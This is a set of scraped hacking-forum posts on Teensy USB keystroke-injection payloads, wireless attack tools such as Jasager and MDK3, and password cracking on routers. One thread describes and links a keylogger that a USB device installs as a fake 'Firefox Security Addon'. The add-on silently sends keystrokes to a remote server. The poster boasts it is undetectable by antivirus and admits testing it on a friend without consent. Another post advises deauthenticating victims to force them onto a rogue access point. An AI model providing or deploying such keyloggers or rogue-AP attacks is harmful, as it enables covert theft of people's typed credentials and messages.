[[Version 1] White Hat Examples?]

Tried this?

http://www.hak5.org/forums/index.php?showtopic=16469

[[Version 1] Firefox Keylogger With Ducky]

Does anyone have the source code for this? The link is no longer working.

I have put them back. Let me know if you have a problem.

[[Version 1] Firefox Keylogger With Ducky]

Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts?

If you have a folder C:\kl (may be from previous runs), then you have to delete it before running it again. Try that and try to plug it in with nothing else running on your computer, may be your computer is slow at multitasking and missing some keystrokes.

[[Version 1] Firefox Keylogger With Ducky]

All the code does it is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to firefox "Hey there is a plugin that you need to load at C:\kl" and when firefox starts it loads the code . Once loaded, the plugin watches all the keystrokes made into browser and quietly posts them to the remote server. The php script is placed in the server, which then takes these keys sent and stores them to a file.

You do not need to load these files into teensy. All you need to do is compile the code in Arduino and flash the teensy with it. When you plug in the teensy, it just echos the code to the files and does the rest of that stuff. You can just try it as it is with out changing anything. you can always uninstall it after testing.

Yes the keylogger is very simple and very effective and completely undetectable as it is effectively just 2 lines of java script running inside a browser. I already field tested it on one of my friends computer and he does not think any thing ever happened at all when teensy installed it. I had to explain him the details and even after that he does not really believe thats possible. Well educate the masses I guess.

[[Version 1] Firefox Keylogger With Ducky]

By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for firefox. When teensy is inserted into usb, it uploads the plugin files into C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into firefox by adding registry key into HKCU\Software\Mozilla\Firefox\Extensions. If firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin(displayed as "Firefox Security Addon") loads when firefox starts the next time. If everything goes fine, it will be done in 10 secs.

The keystrokes are then sent to remote server (specified in the code). The remote server then captures the keystrokes, time stamps and ip stamps (Bonus! we get the ip too) the data and logs it.

Please keep in mind that this is by no means a polished or optimized code, bugs will exist. So watch out. I quickly copy pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this can not be implemented in a more sophisticated way for other plugin supported browsers and for all OS's. I would love to see somebody optimize it.

Download the code from here

http://karmetasploit.com/KL/AllFiles.zip

if you do not bother to change the server or just want to test it, then the logs are currently stored in this location:

http://karmetasploit.com/KL/logger.txt

Some plus points with these kind of keyloggers:

• It works behind what ever firewalls as long as Firefox gets the internet.
• 100% AV undetectable
• You can decide to log or not to log based on ip.

Why bother stealing cookies when you can get all the key strokes. :)

[[Version 1] Beating Heart]

I was trying to get a feel for system delays and general programming flow when using teensy. So I thought I would just do this for the heck of it, and when I did it..... why not share it . It will make someone happy for sure. Understand the risks if you are planning to run it. Do not run on slow systems.

Few things learnt while doing this.

• Delays are so damm important and they are just varying from system to system. Almost need to think of slowest machines.That brings to my second point.
• Feed back from the system is critical, we need to figure out how to get some feedback from system.

/*
.prints the obfuscated ascii heart
.gets the heart into recognizable shape
.says I love you
.beats the heart <-- this may not work on slower machines
***Close all script/text/other programs with text input before running this.
This program can be highly destructive if notepad is not launched for some reason.
Use it at your own risk.***
*/

#include <string.h>

int ledPin = 11;
int i,j,k;
int nBeats = 5; //no of beats
int fHigh = 14; // max font size
int fLow = 6; //min font size
int nSpaces = 20; // times to move the art to right
int cn[] ={0,0,0,0,0}; //to store count of each char in the set to be replaced back
char *rc[]= {"_"," ","I","Love","You"}; // replaced char set in original ascii art
char *rw[] ={"66","99","1","4","3"}; // replaced with this char set to obfuscate it
char *line[] = {"999999999999999999#991994999999999999999999999999#99199499",
  "999999999999#991994993..99999999999999#991994993...#",
  "99999999#991994993...#99199999999#991994993...#99199",
  "999999#991994993...#991994993...#9966666666666666#99199",
  "9999#991994993...#991994993...#99666666666666666666#99199",
  "99#991994993...#991994993...#99199Lo66666666666666#99199",
  "99#991994993...#991994993...#99199499Y666666666666#",
  "#991994993...#991994993...#991994993..6666#991",
  "#991994993...#991994993...#991994993...#9966#",
  "#991994993...#991994993...#991994993...#99199",
  "#991994993...#991994993...#991994993...#99199",
  "99#991994993...#991994993...#991994993...#99",
  "9999#991994993...#991994993...#991994993...",
  "99999999#991994993...#991994993...#991994993",
  "999999999999#991994993...#991994993...#99199Lov",
  "999999999999999999#991994993...#991994993...#",
  "999999999999999999999999#991994993...#99199499Y",
  "9999999999999999999999999999#991994993...#99199L",
  "9999999999999999999999999999999999#991994993.",
  "99999999999999999999999999999999999999#99199499",
  "999999999999999999999999999999999999999999#99199Lo",
  "99999999999999999999999999999999999999999999#99199",
  "9999999999999999999999999999999999999999999999#99"}; // ascii art to be printed

void setup(){
  pinMode(ledPin, OUTPUT); //set led
  delay(2000); // not needed
}


void loop () {
  delay(2000); //wait until hid is detected
  digitalWrite(ledPin, HIGH); //turn led on
  WriteMessage();//main funtion
  KeyCombo(MODIFIERKEY_CTRL,KEY_END); // just in case if the font change function fails, this will not destroy the printed ascii
  KeyPress(KEY_ENTER);
  delay(2000);//let them watch it for couple of seconds
  for(j=1;j<=nBeats;j++){ // make heart beat by changing font size
    Beat(); //this will not work on slower machines.
  }
  ChFont(10); //set back the font size to default 10
  digitalWrite(ledPin, LOW); //tunr led off, we are done
  delay(50000); // delays the loop
}

void WriteMessage(){

  runcmd("notepad.exe"); //open notepad in cmd line
  delay(2000); //wait until note pad is open
  sysMenu(KEY_X); //maximize note pad
  delay(1000); //wait until the command is finished
  ChFont(10); //set the font size to default 10

  for(i=0;i<sizeof(line)/sizeof(line[0]);i++){ //loop through all lines of art
   for(j=0;line[i][j] != '\0';j++){
     
     if(line[i][j] == rw[0][0]){cn[0]++;} //count each char to be replaced
     if(line[i][j] == rw[1][0]){cn[1]++;}
     if(line[i][j] == rw[2][0]){cn[2]++;}
     if(line[i][j] == rw[3][0]){cn[3]++;}
     if(line[i][j] == rw[4][0]){cn[4]++;}
     
     Keyboard.print(line[i][j]); //print each char letter by letter
     delay(20);//this produces something to stare on screen
    }
    
    KeyPress(KEY_ENTER); //new line
    
  }

 for(i=0; i<nSpaces; i++){ //move the whole art to the right, more like to the center of notepad
   KeyCombo(MODIFIERKEY_CTRL,KEY_HOME);
   for(j=0;j<sizeof(line)/sizeof(line[0]);j++){ //move one line at a time and loop through all.
     KeyPress(KEY_SPACE);
     //delay(50);
     KeyPress(KEY_DOWN);
     KeyPress(KEY_HOME);
   }
 }
  
    for(i=0;i<sizeof(rw)/sizeof(rw[0]);i++){ //replace char one by one
    
    KeyCombo(MODIFIERKEY_CTRL,KEY_HOME);
    KeyCombo(MODIFIERKEY_CTRL,KEY_H);
    delay(300);
    sysMenu(KEY_M);
    delay(300); //these are important delays
    ClicknMove(-127,127); //moves replace screen to bottom left end and takes it out of way
    delay(300); //these are important delays to make click work
    
    switch(i){ //replace accordingly
      case 0:
    Keyboard.print(rw[0]);
    KeyPress(KEY_TAB);
    Keyboard.print(rc[0]);
    for(j=1;j < cn[0]/2 -5;j++){ //replace char by char but go few less
      KeyCombo(MODIFIERKEY_ALT,KEY_R);
      delay(100); //delay to stare at the action
    }
    break;
    case 1:
    Keyboard.print(rw[1]);
    KeyPress(KEY_TAB);
    Keyboard.print(rc[1]);
    for(j=1;j < (cn[1]/2 -5);j++){
      KeyCombo(MODIFIERKEY_ALT,KEY_R);
      delay(30);
    }
    break;
    case 2:
    Keyboard.print(rw[2]);
    KeyPress(KEY_TAB);
    Keyboard.print(rc[2]);
    for(j=1;j < cn[2] -5;j++){
      KeyCombo(MODIFIERKEY_ALT,KEY_R);
      delay(70);
    }
    break;
    case 3:
    Keyboard.print(rw[3]);
    KeyPress(KEY_TAB);
    Keyboard.print(rc[3]);
    for(j=1;j < (cn[3] -5);j++){
      KeyCombo(MODIFIERKEY_ALT,KEY_R);
      delay(70);
    }
    break;
    case 4:
    Keyboard.print(rw[4]);
    KeyPress(KEY_TAB);
    Keyboard.print(rc[4]);
    for(j=1;j < (cn[4] -5);j++){
      KeyCombo(MODIFIERKEY_ALT,KEY_R);
      delay(70);
    }
    break;
    
    }
    
      
    KeyCombo(MODIFIERKEY_ALT, KEY_A); //replace remaining few with replace all
    delay(30); // important for above command to be finished.
    sysMenu(KEY_C); //close replace box.
 } 
    
 }

void Beat(){
  
    for(i=6;i<=fHigh;i++){//increase font one size at a time
      ChFont(i);
      delay(20);
    }
    for(k=14;k>=fLow;--k){ //decrease font one size at a time
      ChFont(k);
      delay(20);
    }
   
}

void runcmd(char *cmd){
  KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog
  delay(1500); // wait for it to open
  Keyboard.print(cmd); // enter some command
  KeyPress(KEY_ENTER); // exec some command
}

void KeyPress(int SomeKey) {
  Keyboard.set_key1(SomeKey); // set some key
  Keyboard.send_now(); // "press" some key
  // clear some key
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void KeyCombo(int ModKey,int SomeKey) {
  Keyboard.set_modifier(ModKey); //set one or more modifier keys
  Keyboard.set_key1(SomeKey); // set regular key
  Keyboard.send_now(); // send strokes
  // clear keys
  Keyboard.set_modifier(0); // prep release of control keys
  Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times.
  Keyboard.send_now();
}

void sysMenu(int SomeKey) {
  Keyboard.set_modifier(MODIFIERKEY_ALT); //set one or more modifier keys
  Keyboard.set_key1(KEY_SPACE); // set regular key
  Keyboard.send_now(); // send strokes
  // clear keys
  Keyboard.set_modifier(0); // prep release of control keys
  Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times.
  Keyboard.send_now();
  delay(10);
  Keyboard.set_key1(SomeKey);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}
void ClicknMove(int x, int y){
   Mouse.set_buttons(1,0,0);
   Mouse.move(x, y);
     
  Mouse.set_buttons(0,0,0);
}
void ChFont(int sz){
 KeyCombo(MODIFIERKEY_ALT,KEY_O);
 delay(50); //magic number that works on my machine
 KeyPress(KEY_F); //open font window
 delay(50);
 KeyPress(KEY_TAB);//go to font size
 KeyPress(KEY_TAB);//go to font size
 Keyboard.print(sz);//give new size
 KeyPress(KEY_ENTER);
}

[Ssl Vpn - To A Corporate Net.]

Try dns tunneling with heyoka. It theoretically should work with existing open ports and give u RDP or ssh which ever is listening on ur master.

[Gsm Mitm]

It was very interesting talk at Shmoocon 2010 about GSM MITM and using USRP and OpenBooTS. The only downside of it being the cost.

I came across this today and you might already be aware of it from ATT http://www.wired.com/gadgetlab/2010/03/att-microcell/ . I am not sure if that thing is hackable to begin with but they claim "Device is secure – cannot be accessed by unauthorized users, easy and secure online management of device settings" .... hmm sounds challenging and interesting. Any of you looked into it? May be or if we can use this instead of costly USRP module for GSM MITM?

[Bridging With Linux]

Hey, Thanks for the quick replies...I'm still having some problems.

I followed the link http://karmetasploit.com/archives/55

My dhcp and the network files are exactly the same the examples in the link

before doing anything I used this line to enable wicd manager. Then launched the wicd gui and entered my AP's wpa2 key and was able to go online just fine.

/etc/init.d/wicd start

Back to the original problem, It seems that I'm unable to maintain both the wlan0 and eth0 at the same time. I only can connect to one of them at a time.

should I set my wlan0 (wireless) to master mode or something? or am I doing something wrong still?

Do not use wicd or wicd-client. If I remember it correctly wicd disconnects you from either one of them as soon as you connect to other. So if you want to test it and still want to use wicd, connect to internet as you normally do using wicd then right click on wicd client icon and completly exit it. Then test if you are still connected to internet. After that bring eth0 up using above commands and u should be fine. I believe if you dont exit wicd before bringing eth0 up it will disconnect u from wlan0. I think but I am not sure. try it.

[Bridging With Linux]

Here .. This might help you. Post back here if you have any problems as I definitely got that working.

[Jasager On New Piranha Firmaware?]

Sorry guys I forgot.... I will try to upload it to a rapidshare or some where like that.

I had a copy of it. I hope it is alpha 4. Here is the link.

[I dont get it]

I am new to this USB thing..so please bare with me.

So here are nice tools developed by DB. I downloaded them, made a iso containing all the tools, including a autorun.inf to launch them all. The thing that I dont understand is that, they are all on a "CD-ROM" drive that cant write data (aka dump) . So launching them is useless if they cant dump. How do you launch them from a writable portion of jump drive.

The only thing I can think of is to run a script that in turn launches the files. But how do you know in which drive letter the files really are? Could some one please get me started on "launching files"

[MDK3 Makefile]

Then how can it do both things at same time. You can only multitask(time share) I assume. If so, will it be fast enough? I will be interested to know how you are approaching this.

I'd agree with that but I'm going to put them both on the same because people are asking for it. There will be appropriate warnings.

[MDK3 Makefile]

Best bet to get most of mdk3 and jasager is to run them on seperate fons. run legend/mdk3/aircrack on one fon..use it to deauth ur target client or ap. that forces ur victims to connect to jasager running on second fon automatically. it totally works.

Just installed "libpthread_0.9.28-8_mips.ipk".

Now it works like a charm ;)

<3 <3 <3

[Jasager 1.2 -> 2.1 ?]

thanks ! i was under the impression that it did not require new installs. now i got it.

[John the Ripper]

Yea, I knew it would be pretty slow, but i just wanted to test a 100 word dict file. Anyways I got it running on windows. Thanks

[Jasager 1.2 -> 2.1 ?]

When I tried to upgrade...I got this error

root@OpenWrt:~# ipkg install jasager_2.1.ipk

Upgrading jasager on root from 1 to 2...

Nothing to be done

An error ocurred, return value: 1.

Collected errors:

ERROR: Cannot satisfy the following dependencies for jasager:

ruby-core ruby-rexml

What should I do?

[John the Ripper]

I want to run John on FON for brute forcing WPA (pipe it to aircrack). I currently dont have a linux installation to "Make" the file from source. Is there quick way to get john running on FON? Any ideas or help is appreciated.

[MDK3 Makefile]

Thank you !

[MDK3 Makefile]

I am trying to package the new version of MDK3 V5 into a ipk file but with no luck. Could you please explain the process in depth or upload the ipk file somewhere?

Thanks

I figured out how the Piranha firmware built the mdk3 package today and I was able to I compile my own package :D . mdk3 does kind of work along side karma but there are some minor issues. For example, when I tried setting up jasager on channel 6 and set mdk to channel hop it crashed my Fon+ after a minute or so <_< . However, it did run somewhat OK when both were set to the same channel. Unfortunately, I'm unable to upload the package to the forums. But I'll give everyone the makefile so that you can build it your self and maybe some one will be kind and upload the package for the people that don't know how to build it.

include $(TOPDIR)/rules.mk

PKG_NAME:=mdk3
PKG_REV:=5
PKG_VERSION:=v$(PKG_REV)
PKG_RELEASE:=1

PKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.bz2
PKG_SOURCE_URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
PKG_SOURCE_SUBDIR:=$(PKG_NAME)-$(PKG_VERSION)
PKG_SOURCE_VERSION:=$(PKG_REV)
#PKG_SOURCE_PROTO:=svn

include $(INCLUDE_DIR)/package.mk

define Package/mdk3
  SECTION:=net
  CATEGORY:=Network
  TITLE:=MDK3
  URL:=http://homepages.tu-darmstadt.de/~p_larbig/wlan/
  SUBMENU:=wireless
endef

define Package/mdk3/description
Tool to exploit wireless vulnerabilities
endef

define Build/Configure
endef

define Package/mdk3/install
    $(INSTALL_DIR) $(1)/usr/sbin
    $(CP) $(PKG_BUILD_DIR)/mdk3 $(1)/usr/sbin/
endef

$(eval $(call BuildPackage,mdk3))